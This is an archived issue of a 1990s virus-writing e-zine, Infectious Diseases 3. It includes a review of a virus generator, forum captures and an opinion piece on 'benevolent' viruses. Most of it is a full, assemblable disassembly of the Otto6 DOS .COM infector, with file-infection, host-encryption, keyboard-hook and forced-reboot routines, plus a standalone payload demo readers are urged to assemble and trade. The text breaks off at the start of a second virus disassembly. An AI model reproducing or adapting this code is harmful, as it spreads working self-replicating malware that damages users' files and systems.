💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › ONESHOTS › i-diseases-03.t… captured on 2022-06-12 at 13:47:28.
-=-=-=-=-=-=-
=================================
Infectious Diseases, Issue 3,
Contents:
=================================
Produced by Virulent Graffiti Virus Production Organization
Edited By The Attitude Adjuster
As one irate father said to his slightly preturbed son...
"Give me a reason I should let you use my computer, if all you do is
write viruses on it!?!"
Welcome to my world, dad!
Contents ..................................................... I-D003.001
Letter of Ranting from The Attitude Adjuster ................. I-D003.002
Phalcon/Skism G? Review ...................................... I-D003.003
What I saw the other day on FidoNet .......................... I-D003.004
Disassembly of (HA) YAM's Otto 6 ............................. I-D003.005
Fred Cohen on Virus Based Products ........................... I-D003.006
Disassembly of 10 Past 3 ..................................... I-D003.007
Soupy Virus Source ........................................... I-D003.008
Rapidly Approaching .......................................... I-D003.009
The Confusion Ended? ......................................... I-D003.010
'Shit... What's wrong NOW?!?' ................................ I-D003.011
Disassembly of (we promise this is the last for now) the
Fellowship Virus ............................................. I-D003.012
DWI Source ................................................... I-D003.013
VGVPO Propaganda ............................................. VGVPO.ANS
The Adventures Guild Ad ...... TAG.ANS
Unphamiliar Territory Ad ..... UPT.TXT
Way Cool Lost Horizons Intro . HORIZONS.EXE
are those over the counter virus remedies doing nothing for you?
do you feel as if maybe youre a little bit fucked in the head for buying
that computer in the first place?
maybe its the annoying snide comments on the screen,
or the fact that windows doesnt seem to work anymore,
the secondhand software kills the drive blues...
whatever it is,
you have realized that we are winning,
and you are loosing...
badly
Greetings: Invalid Media, DecimatoR, GHeap, Dark Angel, Pyster,
Unfriendly Giant, HitMan, Mirage, Shades, all virus writers
everywhere, my Mom (my modem ate her!), ICTOA, Paul, Josh,
and anybody else I forgot... oh, yeah, and you too...
============================================
Personal Rant from The Attitude Adjuster
By... err, The Attitude Adjuster
============================================
Err... yo!
Welcome again to Infectious Diseases, and we hope you enjoy this
as much as you've enjoyed our past productions (right... sure...).
It has been a both discouraging and illuminating time since last
issue's release. I have raved on FidoNet more and more (those of you who
know me by name can see my great revelations... I have to keep myself under
control when I use my real name, hopefully I can get one of those Jon
Johnson type accounts to really allow me to express myself...), and was the
one who instigated the 'YAM really did write it' lie... I guess I've kind
of toned down on my YAM bashing, and even edited out most of the bad
comments about them in my dissassembly of their virus in this issue...
I was rather pissed/saddened at the busting of ARCV, which Phalcon/
SKISM has covered with commendable speed and accuracy, thanks guys!
Now, I must say both 'Thank You,' and 'Fuck You,' to all Virulent
Graffiti members, who have both tried and not tried to get articles in for
ID. I, being the asshole-take charge type guy I am edited and put this
issue together in about 4 days, and will probably release it without the
knowledge of the group... I am quite happy with it, mainly because it
contains my disassemblies, and little else... If you don't love yourself,
who do you love? Also, I am trying something new... I know that I love to
view the activation routines out of viruses, but, ripping the code out is
an undue pain in the ass, and, I'd rather not run just any virus on my
system... I have ripped the 'bomb' routines from Otto6, Soupy, and Fellow-
ship, and left them as seperate code under the disassemblies... Go ahead
and assemble 'em, show 'em off... trade with friends... ah... I need a
life..
You'll note that this has a 40Hexish/Social Delinquency look to it.
Well, both of those publications are quite successful, so I figured that I
should use a conglomeration to see what I could come up with... For those
of you that (in the past) call us a P/S copy group, we will again tell you
to go fuck yourselves... True, we both are doing a YAM disassembly, and
true, I am stealing a little of the format, but, the first is a pure
coincedence, and the seconds is professional opinion over ownership... Also
note that we are never planning to release an MPC hack, in Pascal or other-
wise!
========================
Review of the P/S G?
By The Attitude Adjuster
========================
NOTE: The word 'idiot' is used throughout this document to refer to
people who would actually assemble MPC or G? code and use it as an
original virus. Do not confuse this term with the 'idiot' which refers
to users of the 'Bad Influence' BBS (who would probably fit into the
other category as well!)
"G?, Phalcon/Skism's newest virus creation tool, is designed to allow
everyone easy access to computer virus source code. More than a simple
Vienna hack generator, it creates viruses "on-the-fly" as per the user
specifications. G? is designed to be easily maintainable and extensible
through the use of special data files created especially for use by the
program."
-=P/S=- G? Documentation
I downloaded it eagerly, with the same anticipation I feel with
every P/S creation... I exited back to the famed 'C Prompt,' and began
unzipping the new find... but wait... I expected a revised PS-MPC... and I
was (happily) mistaken...
Dark Angel has created another classic (though sure to get listed
under PS-MPC in VSUM, 'cuz hey, she doesn't even know her own name, let
alone what to name anyone's virus... [she fucked me over too, guys!]),
even more effective than the PS-MPC (or prunes...), and even more elegant
than the most IDE-Filled, Icon Based piece of Dynamic Link Library trash.
'On- the-fly' virus generation has come a long way from the VCS and
VCL days. The code is excellent, and even improved over MPC coding. I am
amazed and thrilled by the size of the code, as it is most compact, a great
learning tool for code optimization.
The new 'debug resistance' is also a feature to be commended. Using
the Intel's 'one-byte-interrupt,' and the fact that this interrupt is used
as a breakpoint in debuggers makes for havok in most debuggers. Still, a
hardened programmer can slide by it, but, the 'one-byte-interrupt' factor
makes that a bitch, as the interrupt is, as I said, only one byte, instead
of the average 'CD XX' type configuration...
As with any virus generator, there are cons to be discussed.
DecimatoR makes this point quite clear in 40Hex-9... allow me to
quote him...
"The authors of MPC and VCL are very talented programmers. Unfortunately,
the users of their programs are just the opposite. REAL virus programmers
have a desire to LEARN assembler - it's a test of their skill and ability.
The users of MPC and VCL don't have that desire. They only have a desire
for recognition - and seeing their name in a virus is a massive ego trip
for them. Why? They did nothing that any Joe Blow couldn't have done
using a code generator. If they REALLY want to prove how cool they are,
let THEM write a damn virus generation program and release it. THAT ALONE
will show the world their skill and ability. As for USING the program,
well, I'm more impressed with a nicely formatted term paper using
WordPerfect than I am with viruses created using MPC and VCL. If you're
one of the lame idiots who uses MPC or VCL for "writing" viruses, then
listen up - those programs were written for 2 reasons - to prove the
programmer could write such a thing, and to be used as a LEARNING TOOL for
future virus writers - NOT to be abused the way they currently are."
Exactly the point I want to make, barring that he is not as violent
as I am... but I will stifle the CAPS LOCK here...
There WILL always be the idiots out there that refuse to learn,
merely to 'Wr1tE GnU \/1/>uZeZ (0/> \/I/>11)!!!1!11' Alas, they will NEVER
learn, and, though we may try, points like ours offer little help.
That's why my personal opinion of code generators is quite low. Yes,
it is a VERY impressive work, and, I commend DA for his, as I do Nowhere
Man for his VCL, but, I am still not a supporter of code generators.
It's the stigma I have with 'learning,' something that dates back to
when I was H/P avid (yeah, I' m a hacker turned programmer... yuk!). There
was a hush about users, you kept your mouth shut, learned what you saw,
read the t-files, and did slave work, like scanning, or simple hacking, and
you picked it up.
The code generator idea is fine with me, but, it's release to the
general public hits the nerve in me that many H/P people balked about when
SYS-75 information is released into the public... there seems to be too
much power in the hands of blithering idiots.
A beautiful virus, masterfully coded and programmed, with actual
work by a good-intentioned programmer is fine with me, but, like being
harassed by a company that has had it's INWATS fucked over, having my HD
smashed by a virus coded entirely in MPC, VLC, or G? with a stupid FAT
fucker added in will really ruin my day. (On this note, this would never
happen... only the most heavily armored stealth will get thru my anti-
virus software, which I wrote myself)
Idiots will use the generator, whether you try to stop them or not.
The 'password' on VCL (which was shittily concealed anyway... I mean, the
average joe could tell the ZIP password was ARoseIsARose) did nothing, and
as a result, there are malicious VCL viruses out there.
This is why a listed future improvements bother me... let me quote
it directly...
"o Supports multiple, semi-polymorphic encryption routines (full
polymorphism coming soon)."
Yep... that's what it says, ' full polymorphism.' I have no doubt
that DA can do it. I have dissassembled (partially to source level) the MtE
and fucked with the new (and seemingly fucked up first version of) TPE and
have seen that it is not as hard as plugged to be, merely a task that must
be planned and charted from the start, as it is, in itself, a huge task.
Full polymorphism is something we would all benifit from, but, not to be
given in source form to idiots. I'd belive that text files on this subject,
or something of that like would be more appropriate... but, hey...
On the note of DA's semi-polymorphic routines, they are, indeed,
semi-polymorphic. In the future, he might try something like instruction
flipping or selective BS addition, as an alternative to full polymorphism.
I also fucked up in my original analysis, and I apologize. Assuming that DA
uses all 4 indexable registers (SI,DI,BP,BX) for indirect addressing, and
all other unused registers for counting purposes, coupled with INC/INC,
ADD, and SUB incrementing, and add and xor encryption (I assembled a total
of 100 different CFG files, and only found xor and add encryption) I'd have
to guess at 144 generic wildcard strings to suffice. This is, of course,
too many. Now, assuming that we apply code frame tactics, we get the
following:
MOV (UNKNOWN REGISTER), WORD (COULD BE THE INDEXABLE, MAYBE NOT)
MOV (UNKNOWN REGISTER), WORD (DITTO)
CRYPTLOOP:
002Eh (ONLY IN EXE INFECTORS, CODESEG OVERRIDE)
BYTE (CORRESPONDS TO REGISTER USED FOR OPERATION (INDEXABLE))
BYTE (EITHER 7 OR 37)
WORD (XOR OR ADD VALUE)
EITHER INC/INC, SUB (INDEX REGISTER), -02
OR ADD (INDEX REGISTER), 2
LOOP LOOPCRYPTLOOP (ONLY IF BYTE COUNTER IS CX)
(OTHERWISE)
EITHER DEC/DEC, SUB (BYTE COUNT), 2
OR ADD (BYTE COUNT), -2
OR (BYTE COUNT),(BYTE COUNT)
JNZ CRYPTLOOP
Alogrythmically, this is a piece of cake, which is great, 'cuz the
more alogrythmic scans that must be added to a scanner, the greater it's
size and slowness grow... score one more for the virus writers.
Indeed, with the addition of G? into the world, this is one more
big score for the virus writers... thaks DA!
=========================
What I saw on FidoNet
Capture By The Attitude Adjuster
=========================
Here's something I pulled offa FidoNet Virus... kinda discourages me
in some ways I'll explain below.
===========================================================================
From : GREG GREELY Number : 858 of 987
To : ALL Date : 12/16/92 12:42pm
Subject : True story Reference : NONE
Read : [N/A] (REPLIES) Private : NO
Conf : 168 - Virus................(FN)
Hey, I have a true story for you all.
I got a call from a doctor' s office. Their computers were acting strange
and locking up so I went over there and took a look at the system. Nothing
was out of place until I scanned it. Turns out, the guy has a Stoned virus
that's gone critical and he didn't even know it. He had scan but didn't
know how to run it. Since the system was already critical, I needed a clean
system disk to run CLEAN. It turns out the system disk(the original) was
infected too. The other 2 copies of the system disk, Dbase 3++,
Wordperfect, Windows 3.1, all of them. Every single application and every
single disk he had were infected. I didn't have a system disk with me so I
had to charge him double for going home and getting one. Some people are
sooooooooo ignorant. What a moron.
--- Renegade v12-04 Beta
* Origin: DragonsLaire BBS - 718-596-5938 (1:278/613)
===========================================================================
Okay, Mr. Greely... what a moron, eh?
Is this the message Anti-Virus wants to give to the public? Be
smart or else... I hardly think so...
Anyway, as for this message, I feel so stupid now, 'cuz I don't
have a system disk laying here, and you' d probably have to charge me
double! I think that I should probably be shot because I am so anti-
virus ignorant.
Wake up, you idiot! The man didn't know... so, you ridicule him,
not a brilliant strategy. The man needed to be informed, not chastized
behind his back...
I'm not sure, is this the attitude of most "Anti-Virus
Professionals?" I'd like to know... if you consider yourself one, write
us on one of our boards...
===========================
Disassembly of Otto 6
By The Attitude Adjuster
===========================
Well... I can't help it, I wanted to brush up on my disassmembly
skills, as future projects may call upon them... so, I find the cheapest,
easiest looking virus I can find to tear to tiny little pieces.
YAM's Evolution magazine showed up on Unphamiliar Territory, and
after thoroughly laughing at it, I decided that I'd disassemble one of the
'virii' in it, just because they looked easy.
The code was cheesecake, but, some of it was a tad confusing, and
I have developed the following: "Stupid people do stupid things in stupid
ways!" I realize that this is a slightly old YAM virus, and does not do
justice to the level of some of their work, but, let's face it, some of
this is damn funny!
This code is a byte-for-byte matchup with Otto6, and I even followed
the alternate encoding used by YAM's assembler... (apparently theirs loves
to assemble using opcode r/m+mod reg, rather than the more conventional
opcode reg r/m+mod!)
Anyway, here's what Patti has to say about it...
===========================================================================
Virus Name: Otto6
Aliases:
V Status: Rare
Discovered: September, 1992
Symptoms: .COM file growth; decrease in total system & available free
memory; host program encrypted
Origin: United States
Eff Length: 640 Bytes
Type Code: PNCK - Parasitic Non-Resident .COM Infector
Detection Method: F-Prot, ViruScan, Sweep, AVTK 6.00+, UTScan 25.10+,
NShld V99+, Sweep/N
Removal Instructions: Delete infected files
General Comments:
The Otto6 virus was received in September, 1992. It is from the
United States. Otto6 is a non-resident, direct action infector
of .COM programs, including COMMAND.COM. It does install a small
portion of its code in memory, though it is not a complete copy
of the virus, and the virus is not infective from memory.
When the first Otto6 infected program is executed, the Otto6 virus
will install a small portion of its viral code at the top of system
memory but below the 640K DOS boundary. Total system and available
free memory, as indicated by the DOS CHKDSK program, will have
decreased by 2,048 bytes. Interrupt 9 will be hooked by the portion
of Otto6 resident in memory, providing it was not previously hooked
by some other program. Also at this time, the Otto6 virus will
infect one .COM program located in the current directory.
Each time a program infected with the Otto6 virus is executed, the
Otto6 virus will infect one previously uninfected .COM program
located in the current directory. Infected programs will have a
file length increase of 640 bytes with the virus being located at
the end of the file. The program's date and time in the DOS disk
directory listing will not be altered. The following text strings
are encrypted within the viral code:
"OTTO6 VIRUS, <<?S>>, YAM,
COPYRIGHT MICROSHAFT INDUSTRIES 1992"
"<<?S>> YAM, MICROSHAFT INDUSTRIES (tm.) 1992!"
"*.COM"
The Otto6 virus is an encrypted virus. It not only encrypts the
viral code, but the host program as well.
It is unknown what Otto6 does besides replicate.
===========================================================================
Oh, yeah, and I can tell you what it does besides replicate... it
displays it' s second copyright message when you press Ctrl-Alt-Del... big
shit, eh? Shit, I'm surprised that description doesn't read COM and EXE
growth... you can never be certainly with those wily little viruses!
===========================================================================
; Otto #6 Virus, By Youth Against McAfee
; Disassembly By The Attitude Adjuster of Virulent Graffiti for
; Infectious Diseases 3 and some other uses...
; Assemble with: TASM /m2 otto5.asm for a byte for byte matchup
; TLINK /t otto5.obj
; The assembled code will NOT execute... a big thanks to YAM for that one! The
; only workaround I got is to trace thru til the mov [00FFh], al, and just
; move the ip ahead to startencrypt!
.model tiny
.code
org 100h
start:
db 0e9h, 02, 00 ; jmp near virusentry
nop ; they had to be here
nop ; in the original
virusentry:
call getdelta ; get delta ofs
getdelta:
pop si
push si
sub si,offset getdelta ; sub original ofs
pop ax ; delta in ax
sub ax,100h
mov ds:[00FFh],al ; ds:00FFh == al
push si ; save delta
mov cx,260h ; ieterations
add si,offset startencrypt
cryptloop:
xor [si],al ; xor
inc si
rol al,1 ; rotate
loop cryptloop ; loop if cx > 0
pop si ; delta in si
startencrypt:
mov ax,word ptr ds:[first3+si] ; restore first
mov dh,byte ptr ds:[first3+si+2] ; 3 bytes
mov word ptr ds:[100h],ax
mov byte ptr ds:[102h],dh
lea dx,[si+file] ; find *.COM
xor cx,cx
mov ah,4Eh
findfirstnext:
int 21h
jnc checkinfected ; carry?
jmp takeithome ; no more files
checkinfected: ; check file
mov dx,offset 9Eh ; filename in default
mov ax,3D02h ; dta
int 21h ; open file r/w
mov bx,ax ; handle in BX
mov ax,5700h ; get file date
int 21h
cmp cl,3 ; cl = 3?
jne infectitthen ; nope
mov ah,3Eh ; infected, close
int 21h
mov ah,4Fh ; find next *.COM
jmp short findfirstnext ; again
infectitthen: ; infect the file
push cx ; push time
push dx ; push date
call lseekstart ; lseek beginning
lea dx,[si+first3] ; buffer at first3
mov cx,3 ; read 3 bytes
mov ah,3Fh
int 21h
xor cx,cx ; lseek the end
xor dx,dx ; fileside DX:AX
mov ax,4202h
int 21h
; 4D1h
mov word ptr ds:[fsize+si],ax ; save fsize
sub ax,3 ; calculate jump
mov word ptr ds:[fsize2+si],ax
call lseekstart
add ax,6 ; fsize+3
mov byte ptr ds:[lob+si],al ; lob of fsize+3
mov cx,word ptr ds:[fsize+si] ; size of file
lea dx,[si+heap] ; point at buffer
mov ah,3Fh
int 21h ; read
push si ; push delta
mov al,byte ptr ds:[lob+si] ; lod of fsize+3
add si,offset ds:[heap+3] ; point at code
call encrypt ; encrypt original
pop si ; pop delta
call lseekstart ; lseek beginning
mov cx,word ptr ds:[fsize+si] ; fsize
lea dx,[si+heap] ; buffer at heap
mov ah,40h ; write file
int 21h
jnc finishinfect ; error (attributes)
jmp short takeithome ; yes
finishinfect:
lea dx,[si+virusentry] ; write encrypter
mov cx,startencrypt-virusentry ; to file
mov ah,40h
int 21h
push si ; push delta
mov cx,heap-startencrypt ; virus length-crypt
; mov di,si ; delta in di
db 89h, 0F7h ; alternate encoding
add di,offset ds:[heap] ; point at heap
add si,offset ds:[startencrypt] ; point at virus
rep movsb ; copy code to heap
pop si ; pop delta
push si ; push delta
mov al,byte ptr ds:[lob+si] ; lob of fsize+3
mov cx,heap-startencrypt ; virus length
add si,offset ds:[heap] ; buffer at heap
call encrypt ; encrypt heap
pop si ; pop delta
mov cx,heap-startencrypt ; virus length
lea dx,[si+heap] ; buffer at heap
mov ah,40h ; write virus
int 21h
jc takeithome ; error?
call lseekstart
lea dx,[si+jump] ; buffer at jump
mov ah,40h ; write jump
mov cx,3
int 21h
jc takeithome ; error?
pop dx ; pop date
pop cx ; pop time
mov cl,3 ; set infected flag
mov ax,5701h ; set time
int 21h
mov ah,3Eh ; close file
int 21h
takeithome:
push si ; push delta
mov al, byte ptr ds:[00FFh] ; saved xor byte
xor cx,cx
; add cx,si ; the pricks use
db 01, 0f1h ; alternate encoding
add cx,3 ; ieterations in cx
mov bp,103h
mov si,bp ; unencrypt old code
call encrypt
pop si ; pop delta
mov bp,100h ; where to RET to
mov ax,0B0Bh ; RuThereCall
int 9
cmp ax,0BEEFh ; if beefy, it's
je skipinstall ; installed
xor ax, ax
mov ds, ax ; interrupt table
lds bx, dword ptr ds:[9*4] ; Int 9 -> DS:BX
push bp ; push ret addr
mov bp,offset ds:[old9] ; JMP FAR PTR
mov cs:[bp+si+1],bx ; offset
mov cs:[bp+si+3],ds ; segment
pop bp ; pop ret addr
mov bx,es
dec bx ; our MCB paragraph
mov ds,bx
sub word ptr ds:[0003],80h ; allow for us to get
; some memory
mov ax, word ptr ds:[0012h] ; 1st unused segment
sub ax,80h
mov word ptr ds:[0012h],ax ; replace valu
mov es,ax ; es = our new seg
push cs ; ds = cs
pop ds
xor di,di ; es:0000 = dest.
; mov bx,si ; more alternate
db 89h, 0f3h ; encoding!!
lea si,[bx+our9] ; buffer at our9
mov cx,200 ; more than enough
rep movsb ; copy 200 bytes
mov ds,cx ; cx = 0000
mov word ptr ds:[9*4],0 ; offset (int 9)
mov word ptr ds:[9*4+2],es ; segment (int 9)
skipinstall:
push cs ; restore segments
push cs
pop ds
pop es
push bp ; return to 100h
ret
encrypt: ; encrypt
xor [si],al ; xor
inc si
rol al,1 ; rotate left
loop encrypt ; Loop if cx > 0
ret
db 'OTTO6 VIRUS, <<',0E9h,53h,'>>, YAM, '
db 'COPYRIGHT MICROSHAFT INDUSTRIES 1992 (tm.)'
lseekstart:
push ax
push cx
push dx
mov ax, 4200h ; lseek beginning
xor cx,cx
xor dx,dx
int 21h
pop dx
pop cx
pop ax
ret
our9: ; our int9 handler
cmp ax, 0B0Bh
jnz NotRuThere ; not an ruthere
mov ax, 0BEEFh
IRet ; int return
NotRuThere:
push ax ; save registers
push bx
push ds
xor ax,ax ; BIOS segment
mov ds,ax
in al,60h ; get keyboard input
mov bl, byte ptr ds:[0417h] ; get shift status
test bl,08 ; alt pressed?
jz removeregistersandleave ; no
test bl,04 ; ctrl pressed?
jz whyisthishere ; no
cmp al, 53h ; delete?
jnz removeregistersandleave ; nope!
and bl,0F3h ; mask off bits
mov byte ptr ds:[0417h],bl ; place in bios
jmp onwardbuttheads ; go on
whyisthishere:
cmp al,4Ah ; why is this here?
jne removeregistersandleave
removeregistersandleave:
pop ds ; remove registers
pop bx
pop ax
; jmp returntoold9 ; more wierd
db 0e9h, 20h, 00 ; encoding!
onwardbuttheads:
push cs ; ds = cs
pop ds
mov ax,3 ; 80x25 text mode
int 10h
mov ah,2 ; set cpos
mov bh,0
mov dx,0A14h ; 10,20
int 10h
mov si,yamlogo-our9 ; point to logo
pointlessloop:
loop pointlessloop
lodsb ; load string byte
cmp al,0 ; end of string?
je coldbootus ; yes
mov ah,0Eh ; display char in al
int 10h
jmp short pointlessloop
returntoold9:
old9 db 0EAh ; JMP FAR PTR
dd 00000000 ; Int 9h
yamlogo db '<<',0E9h,53h,'>>, YAM, MICROSHAFT INDUSTRIES (tm.) 1992!'
db ' ',0
coldbootus:
mov dx,28h
mov ds,dx ; DS = 0028h
mov word ptr ds:[0072h],0 ; DS:0072h=0
; the above does nothing, as the byte they are looking to modify is
; the warm-boot status byte, at 0040:0072h... duh...
db 0EAh ; JMP FAR PTR
db 00h, 00h, 0FFh, 0FFh ; Cold Boot Vector
file db '*.COM',0 ; search wildcard
first3 db 0CDh, 20h, 00h ; buffered 1st 3
jump db 0E9h ; jmp near
fsize2 db 50h, 01h
lob db 56h ; lob of fsize+3
fsize db 53h, 01h ; filesize
heap:
end start
===========================================================================
; Hurredly written stand-alone demonstration of Otto6, By The Attitude
; Adjuster.
; Assemble with:
; tasm obomb /m2
; tlink obomb /t
.model tiny
.code
org 100h
start:
mov ax, 0B0B0h
int 9
cmp ax, 0BEEFh
jz exit
mov ax, 3509h
int 21h
mov word ptr [old9+1], bx
mov word ptr [old9+3], es
mov ax, 2509h
mov dx, offset our9
int 21h
mov dx, offset endofit
int 27h
exit:
int 20h
our9: ; our int9 handler
cmp ax, 0B0Bh
jnz NotRuThere ; not an ruthere
mov ax, 0BEEFh
IRet ; int return
NotRuThere:
push ax ; save registers
push bx
push ds
xor ax,ax ; BIOS segment
mov ds,ax
in al,60h ; get keyboard input
mov bl, byte ptr ds:[0417h] ; get shift status
test bl,08 ; alt pressed?
jz removeregistersandleave ; no
test bl,04 ; ctrl pressed?
jz whyisthishere ; no
cmp al, 53h ; delete?
jnz removeregistersandleave ; nope!
and bl,0F3h ; mask off bits
mov byte ptr ds:[0417h],bl ; place in bios
jmp onwardbuttheads ; go on
whyisthishere:
cmp al,4Ah ; why is this here?
jne removeregistersandleave
removeregistersandleave:
pop ds ; remove registers
pop bx
pop ax
; jmp returntoold9 ; more wierd
db 0e9h, 20h, 00 ; encoding!
onwardbuttheads:
push cs ; ds = cs
pop ds
mov ax,3 ; 80x25 text mode
int 10h
mov ah,2 ; set cpos
mov bh,0
mov dx,0A14h ; 10,20
int 10h
mov si,offset yamlogo ; point to logo
pointlessloop:
loop pointlessloop
lodsb ; load string byte
cmp al,0 ; end of string?
je coldbootus ; yes
mov ah,0Eh ; display char in al
int 10h
jmp short pointlessloop
returntoold9:
old9 db 0EAh ; JMP FAR PTR
dd 00000000 ; Int 9h
yamlogo db '<<',0E9h,53h,'>>, YAM, MICROSHAFT INDUSTRIES (tm.) 1992!'
db ' ',0
coldbootus:
mov dx,28h
mov ds,dx ; DS = 0028h
mov word ptr ds:[0072h],0 ; DS:0072h=0
; the above does nothing, as the byte they are looking to modify is
; the warm-boot status byte, at 0040:0072h... duh...
db 0EAh ; JMP FAR PTR
db 00h, 00h, 0FFh, 0FFh ; Cold Boot Vector
endofit:
end start
===========================================================================
========================
Virus Based Products
By Fred Cohen
Capture by The Fly
========================
I am surprised that so many well respected Virus-L readers and
writers failed to understand the implication of creating 1500 viruses per
day that are not detected by existing scanners. The point is that the
number or percentqge of viruses detected is not as important as the effect
of the product.
Of the CARO collection of over 1500 viruses, only a small portion
have ever been found at a substantial number of sites, and many are
collector-only viruses that have never appeared in the wild.
I am quite astounded by the concept that creating viruses in the
privacy of my home should offend anti-virus types. In fact, I have had
automated virus generation systems running for several years. At one point,
I was trying to create ecosystems by randomly generating tens of thousands
of candidates per day, many of which were successful viruses. Why does
this offend other researchers? And I take it from some of the comments
that these researchers have NEVER created a virus of their own to explore
the concept! It's sad that people who have never tried it feel free to
condemn it. Or have they done it and simply don't have the integrity to
admit it?
ASP has already introduced one virus-based commercial product
(which has never been detected as a virus by any scanner) which operates
quite well, and we are in the process of creating another virus-based
product designed to operate in LANs. Our users don't seem to be offended
by the optimization of resource utilization, automated distribution and
installation, high reliability, and small space used by our products based
on viruses, but it seems to offend the anti-virus community that all of
their overblown claims about all viruses being bad are being undercut by
benevolent viruses that are safe and reliable. In fact, most of our
viruses work on far more systems than most virus defenses, and they don't
spread where they are not supposed to go. They are easy to control and
remove, they are compatable with every DOS based system we have seen to
date, and they have never generated any unintended side-effects. Kinda
blows the whole "all viruses are bad" thing, huh!
NEW PRODUCT ANOUNCEMENT - BENEVOLENT VIRUSES IN LANS
AUTOMATE MUCH OF LAN MANAGEMENT - ANTI-VIRUS COMMUNITY
SHUDDERS - SCANNER PRODUCTS MUST ADAPT TO DIFFERENTIATE
BETWEEN KNOWN GOOD VIRUSES AND VARIENTS CREATED BY BAD
VIRUS WRITERS - FOR DETAILS CONTACT ASP
P.S. considering the people who agree with my recent postings, I may
have been wrong - nah - you know you're not saying much when everyone
agrees with you - the lemmings to the sea thing and all.
============================
Disassembly of 10 Past 3
By The Attitude Adjuster
============================
Well... I was bored, and, I am still relatevly bad at doing
disassemblies, so, I thought I'd do a seemingly interesting virus, and
do it well...
First, what Patti says...
===========================================================================
Virus Name: 10 Past 3
Aliases: 748
V Status: Rare
Discovery: 1991
Symptoms: .COM file growth; keyboard keypresses altered; system reboots;
hardware devices disabled or interference
Origin: Unknown
Eff Length: 748 Bytes
Type Code: PRaCK - Parasitic Resident .COM Infector
Detection Method: CPAV 1.4+, AVTK 6.0+, F-Prot, IBMAV, Iris, Panda, VNet,
VBuster 3.93+, ViruScan V99+, Sweep 2.43a+, Trend,
AllSafe, ViruSafe, NAV 2.1.2+, UTScan 25.10+, Vi-Spy,
CPAV/N, LProt, NShld V99+, Sweep/N
Removal Instructions: Delete infected files
General Comments:
The 10 Past 3, or 748, virus was submitted in November, 1992. This
virus was actually isolated much earlier, in early 1991. 10 Past 3
is a memory resident infector of .COM programs, including
COMMAND.COM.
The first time a program infected with the 10 Past 3 virus is
executed, this virus will install itself memory resident in low
available system memory, hooking interrupts 21 and 6B. Total
system and available free memory, as measured by the DOS CHKDSK
program, will not be altered.
Once the 10 Past 3 virus is memory resident, it will infect .COM
programs, including COMMAND.COM, when they are executed. Infected
programs will have a file length increase of 748 bytes with the
virus being located at the end of the file. The program's date and
time in the DOS disk directory listing will not be altered. No
text strings are visible within the viral code.
The 10 Past 3 virus activates between 15:10 and 15:13 (3:00PM and
3:15PM) every day, at which time it will cause the "Ctrl" or "Shift"
keys to be invokes occassionally when the system user enters a
character on the system keyboard. As a result, the character input
may not be the same as what the user intended. Additionally, it
either disables or interfers with the functioning of the following
devices on the days of any month indicated below:
1st day of any month - keyboard
10th day of any month - system hard disk
16th day of any month - system monitor/display
29th day of any month - disk drives
On the 22nd day of any month, unexpected system reboots may occur.
Known variant(s) of 10 Past 3 are:
10 Past 3-B: A 789 byte variant of the 10 Past 3 virus, this
variant adds 789 bytes to the .COM programs it infects,
including COMMAND.COM. It will occassionally display
the following text on the system monitor:
"Therese"
The text is visible within the viral code in all
10 Past 3-B infected programs.
Origin: Republic Of South Africa January, 1993.
===========================================================================
Now, allow me to quote from the woman who can't write...
'The 10 Past 3 virus activates between 15:10 and 15:13 (3:00PM and
3:15PM) every day, at which time it will cause the "Ctrl" or "Shift"'
Sheesh, Patti, grow a little programming knowledge, and maybe learn
how to read military time!
Anyway, here's the code, hope you like it... I found it to be a
thoroughly boring piece of code, 'cept for a few little things, just angles
I had yet to look from... As always, this is byte for byte with the sample
that I worked from... Scans as it, must be it ("Look man, RedX!" Ha!)...
===========================================================================
.model tiny
.code
; 10 Past 3, Disassembly done by The Attitude Adjuster for ID Issue 3.
; All hail the holy XCHG AX,AX!
org 100h
start:
db 0E9h, 1Dh, 00 ; jmp near intovirus
db 0B4h, 09h ; mov ah, 9
int 21h
int 20h
nop ; F!#K
nop ; F!#K
nop ; F!#K
nop ; F!#K
nop ; F!#K
nop ; F!#K
nop ; F!#K
hello db 'Hello world !', 0Dh, 0Ah, '